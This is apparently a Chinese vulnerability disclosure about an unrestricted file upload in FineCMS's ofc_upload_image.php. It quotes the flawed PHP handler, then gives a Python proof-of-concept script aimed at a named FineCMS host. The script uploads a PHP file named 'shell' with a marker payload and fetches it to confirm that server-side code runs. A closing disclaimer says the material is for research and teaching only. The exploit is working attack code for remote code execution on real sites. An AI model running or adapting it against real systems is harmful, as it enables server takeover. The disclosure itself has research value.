路径:dayrui/libraries/Chart/ofc_upload_image.php
$default_path = '../tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true); $destination = $default_path . basename( $_GET[ 'name' ] ); echo 'Saving your image to: '. $destination; $jfh = fopen($destination, 'w') or die("can't open file"); fwrite($jfh, $HTTP_RAW_POST_DATA); fclose($jfh);
无任何限制,可以直接上传。。
poc:
#!/usr/bin/env python # -*- coding: utf-8 -*- #__author__ = '1c3z' import urllib2 import random fileName = "shell" + str(random.randrange(1000,9999)) + ".php" target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" def uploadShell(): url = target + "?name=" + fileName req = urllib2.Request(url, headers={"Content-Type": "application/oct"}) res = urllib2.urlopen(req, data="<?print(md5(0x22))?>") return res.read() def poc(): res = uploadShell() if res.find("tmp-upload-images") == -1: print "Failed !" return print "upload Shell success" url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName md5 = urllib2.urlopen(url).read() if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1: print "poc: " + url poc()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论